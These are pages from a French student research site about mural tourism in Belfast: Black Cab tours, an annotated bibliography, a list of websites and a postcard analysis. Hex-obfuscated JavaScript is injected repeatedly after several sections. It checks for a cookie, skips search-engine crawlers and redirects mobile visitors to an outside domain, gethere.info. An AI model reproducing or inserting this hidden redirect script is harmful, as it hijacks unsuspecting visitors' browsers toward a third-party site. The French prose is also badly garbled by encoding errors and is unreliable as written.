)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Circuits Touristiques

Le programme officiel du voyage prA�voyait divers tours organisA� A� travers la ville.
Nous avons pu intA�grer ces diffA�rents circuits A� nos recherches, car ils nous ont permis de rendre compte de l’offre touristique en rapport aux murals, proposA� aux visiteurs.

Ci dessous vous trouverez les liens commentant les divers tours.

Notre voyage A� dA�butA� avec ce tour qui prA�sente la ville dans son ensemble. Seule la partie concernant les murals et les Troubles est prise en compte dans notre recherche.
Double Decker Bus Tour

Le Black Cab Tour est l’une des attractions autour desA�murals les plus populaires A� Belfast. Il s’agit d’anciens membres de l’IRA* reconvertis A� leur sortie de prison en chauffeur de taxi. Les Black Cabs ont la particularitA� de prA�senter aux touristes les quartiers impliquA�s dans les Troubles. Ainsi chaque conducteur effectue un tour diffA�rent, selon ses affinitA�s, son passA� et les demandes des visiteurs. Notre groupe s’A�tant rA�parti dans deux taxis diffA�rents, les deux trajets respectifs sont prA�sentA�s ci dessous.
Black Cab Tour A
Black Cab Tour B

Ouvert rA�cemment, le Andy Tyrie Interpretive Centre fait office de musA�e loyaliste A� Belfast. Sa visite A� A�tA� accompagnA�e d’un tour pA�destre A� travers le quartier de east Belfast.
East Belfast

*IRA – Irish Republican Army

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Bibliographie et Sitographie intA�grale

Bibliographie

ChA�roux, ClA�ment, Diplopie, Paris, Le Point du Jour, 2009

Cet ouvrage sa��A�tend sur la��utilisation faite par la presse A�tasunienne des images des attentats du 11 septembre 2001. Bien que les thA�matiques et les recherches soient rA�solument diffA�rentes la��une de la��autre, la��ouvrage de la��historien de la photographie ClA�ment ChA�roux nous donne certaines clefs pour penser et aborder la rA�pA�tition da��une image. Il prend la��exemple de la tristement cA�lA?bre photographie de la boule de feu crA�A�e par la��explosion des rA�servoirs da��hydrocarbure de la��avion ayant percutA� la tour sud du World Trade Center, qui est apparue en premiA?re page dans 41% des journaux amA�ricains, entre le 11 et le 12 septembre. Dans une idA�e similaire A� la sienne, nous tenterons da��A�tablir un classement des murals les plus reprA�sentA�s, dans des supports destinA�s aux touristes. De plus, la��ouvrage par son analyse dA�taillA�e, autant des images, que de leurs mise en boucle et du sentiment de dA�jA�-vu les entourant, nous donnes des outils afin d’apprA�hender nos rA�flexions sur la rA�pA�tition da��un motif.

HA�hnel-Mesnard, C., LiA�nard-Yeterian, M., Marinas, C. (dirs), Culture et mA�moire: reprA�sentations contemporaines de la mA�moire dans les espaces mA�moriels, les arts du visuel, la littA�rature et le thA�A?tre., Palaiseau, A�d. A�cole Polytechnique, 2008

Cet ouvrage sa��intA�resse A� la��expression de la mA�moire commune sur divers support, notamment visuel. Ca��est notamment la contribution de Julie Mc Donald et Declan Mc Cavana, A� travers leurs article The Walls of Belfast Speak Louder Than Words qui se rapporte le plus A� notre sujet de recherche. Il se penche en effet sur la question de la��expression de la mA�moire du conflit ayant divisA� la ville, A� travers la��analyse de Murals. Nous avanA�ons en effet la��hypothA?se que les images-types, ca��est A� dire les reprA�sentations les plus frA�quentes des fresques, que nous auront observA�es et dA�finit, seront vraisemblablement fortement liA�e A� la mA�moire de certains A�vA�nements ou certaines personnalitA�s du conflit. Cet ouvrage, et la��article de Mc Donald et Mc Cavana en particulier, nous permettent de comprendre et da��aborder les enjeux de la mA�moire sur un support le visuel.

MFS Press, The Belfast Mural Guide, Belfast, 2014

Ce petit guide de poche est un recueil des murals les plus populaires et de quelques sites en lien avec les Troubles. Il A� l’avantage de les situer prA�cisA�ment et de donner de l’information quant au motif de la fresque. Pourtant, il n’est de loin pas exhaustif. AchetA� dans la trA?s sA�lective boutique rattachA�e au siA?ge de Sinn FA�in, parti politique de l’ancien IRA,A� l’ouvrage prA�sente toutefois desA�murals partisans des deux cA?tA�s du conflit.

Morand, A-C., MA�moire de Belfast ou Le processus de la mise en tourisme de la mA�moire et de leurs expressions spatiales, Exemple appuyA� sur Belfast (Irlande du Nord). MA�moire professionnel sous la direction de Maria Gavari-Barbas, A�Paris, UniversitA� de Paris 1 – PanthA�on Sorbonne, 2008-2009.

Ce mA�moire sa��intA�resse A� la��A�mergence des pratiques touristiques autour des troubles en Irlande du Nord. Anne-CA�line Morand y A�tudie notamment les enjeux autour de la mise en tourisme des tA�moignages du conflit, A� travers la��A�tude de la��offre et de la demande mais aussi des divers discours A�mis par des agents touristique.

 

 


Sitographie

Belfast Murals – http://belfast-murals.co.uk/

Ce site internet rassemble un grand nombre des murals de la ville, qua��il place sur une carte interactive. De plus, il divise les fresques en trois catA�gories: les murals loyalistes, les murals unionistes ainsi que les murals dA�signA�s comme A�tant sociaux ou culturels, qui reprA�sentent les fresques plus rA�centes, gA�nA�ralement mandatA�es par la ville au cours du processus de paix, pour renforcer une identitA� rA�gionale. Ce site internet nous permettra de localiser gA�ographiquement les murals que nous A�tudierons. Na��A�tant toutefois pas toujours trA?s prA�cis, ni absolument complet, il sera utilisA� en alternance avec la��outil Street View de Google.

 var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Interviews dans la rue

[en construction]var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

ConfA�rences

[en construction]var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Cartes postales

Afin de nous faire une idA�e de l’image des murals envoyA�e vers l’extA�rieur, vous avons cherchA�s A� collectionner des cartes postales.

Pourquoi des cartes postales?

En effet, les cartes postales A� vocation touristique sont vendues aux visiteurs dans l’objectif d’A?tre partagA�es avec un rA�seau A�tranger. Ainsi une carte postale doit remplir certaines conditions. PremiA?rement, elle doit procurer au touriste envoyant la carte A� une tierce personne une forme de fiertA�, bien souvent inconsciente. L’envoi de carte postale signifie en effet A�regarde oA? je suis et oA? tu n’es pas!A�, si tel n’A�tait pas le cas, nous nous contenterions de lettre sur papier blanc. L’image reprA�sentA�e doit donc vendre le lieu d’oA? elle provient, afin d’allA�cher le rA�cepteur de la carte.

L’analyse de cartes postales nous est donc apparu comme un moyen de rendre compte de ceux qui, parmi les nombreux murals diffA�rents de Belfast, A�taient jugA�s comme A�tant particuliA?rement reprA�sentatif de ce que la ville a de mieux A� offrir.

On comprend que la carte postale joue un rA?le clef dans l’entretien d’un cercle d’image, puisse qu’elle permettra au visiteur ayant reA�u par le passA� un telle carte, une fois sur place, de rattacher celle-ci A� son expA�rience prA�sente. De part ce « dA�jA�-vu », l’A�lA�ment reprA�sentA�, dans notre cas, un mural, lui apparaA�tra comme A�tant pittoresque1, c’est A� dire digne d’A?tre vu ainsi que d’A?tre photographiA�.

A� Le touriste identifie un lieu […] comme pittoresque parce qu’il l’a dA�jA� vu et qu’il peut le comparer A� ce qu’il connaA�t dA�jA�, soit par son expA�rience, soit grA?ce aux images qui en existentA�2

La rA�colte

Au fil de nos journA�es A� Belfast, nous avons donc traquA�s puis achetA�s les cartes postales comportant des photographies de murals. Nous avons toutefois A�tA� forcA�s de constater que le choix A�tait A�restreint. En une semaine, il nous a A�tA� possible de rA�colter 6 cartes, d’intA�rA?t plus ou moins important pour notre recherche dans des lieux divers. Si nous avons trouvA� la premiA?re dans un supermarchA� alimentaire et deux autres dans un bureau de poste, les trois restantes ont A�tA� achetA�es dans deux magasins de souvenirs diffA�rents.

Les 6 cartes postales prA�sentA�es

La premiA?re carte [fig.1], trouvA�e comme susmentionnA� dans une supermarchA� alimentaire, semble A?tre la plus frA�quente. En effet, nous l’avons aperA�u dans diverses boutiques au fil de notre sA�jour. Huit dA�tails de murals ou fresques en entier y sont reprA�sentA�.

DiffA�rentes figures emblA�matiques en lien avec les Troubles y sont visible: la Reine da��Angleterre [en haut A� gauche], le Duc d’Orange [en haut, 3em A�cusson depuis la gauche], ou encore l’activiste dA�cA�dA� lors d’une grA?ve de la faim et A�rigA� au rang de martyr, Bobby Sands [en bas A� gauche].

Selon nos recherches, la majoritA� des fresques reprA�sentA�es sur cette carte postale ne sont plus existantes: elles ont A�tA� recouvertes ou, A� l’instar de la « Mona Lisa de Shankill » (en bas, 2em A�cusson depuis la gauche), dA�truites rA�cemment.

Les deux cartes suivantes [fig. 3 et fig.4], trouvA�es dans une petite boutique sur Falls Road reprA�sentent des fresques et des dA�tails de fresques situA�es dans west Belfast, notamment du International Peace Wall. Les cartes se positionnent du cA?tA� unioniste du conflit. Ceci peut A?tre interprA�tA� par le choix des motifs prA�sentA�s: plusieurs dA�tails de murals sur les Blanketstrikers [en haut au centre et en bas A� droite de fig.3], avec notamment Kieran Nugent, [au centre de fig.2] premier prisonnier rA�publicain A� se vA?tir de sa couverture, refusant ainsi de porter l’uniforme imposA� aux prisonniers, et revendiquant de la sorte le statut de prisonnier politique3. Mais aussi un tA�moignage de solidaritA� A� la Palestine, particuliA?rement revendiquA� par le cA?tA� rA�publicain [fig.3 en haut A� gauche]. Ainsi que des murals commA�morant divers A�vA?nements ayant marquA� la communautA� catholique en Irlande du Nord, tel que l’attaque du Milltown Cemetery, lors de l’enterrement de trois membres de l’IRA, tuA� A� Gibraltar en 1988 par des soldats de l’armA�e britannique4.

La qualitA� d’impression, le papier utilisA� ainsi que les polices d’A�criture imprimA�es au dos des cartes postales, laissent avancer qu’il s’agit d’une production amateur. La mention A� This postcards are only available in Belfast, at Green’s, Falls Road A� sur le revers de la carte suppose que les cartes sont produites par la boutique qui les vend.

